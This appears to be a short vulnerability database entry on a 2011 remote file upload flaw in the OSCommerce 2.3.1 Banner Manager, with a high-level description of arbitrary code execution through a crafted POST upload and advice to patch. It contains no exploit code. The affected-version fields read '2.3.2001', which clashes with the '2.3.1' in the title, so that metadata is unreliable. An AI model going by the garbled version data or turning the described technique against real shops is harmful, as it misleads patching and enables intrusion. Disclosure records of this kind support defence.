Vendor: OSCommerce
By: Number 7
CVSS: 8.8 (HIGH)
Remote File Upload Vulnerability
CWE: 434
Product Name: OSCommerce
Affected Version From: 2.3.2001
Affected Version To: 2.3.2001
Patch Exists: Yes
Related CWE: N/A
CPE: oscommerce
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Apache, Windows, Mac OS
2011
OSC 2.3.1: Remote File Upload Vulnerability : Banner Manager
OSC 2.3.1 does not sufficiently validate uploaded files. An attacker can exploit this by sending a specially crafted HTTP POST request containing a malicious file to the vulnerable server; the file is uploaded to the server, and the attacker can then execute arbitrary code.
Mitigation:
The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.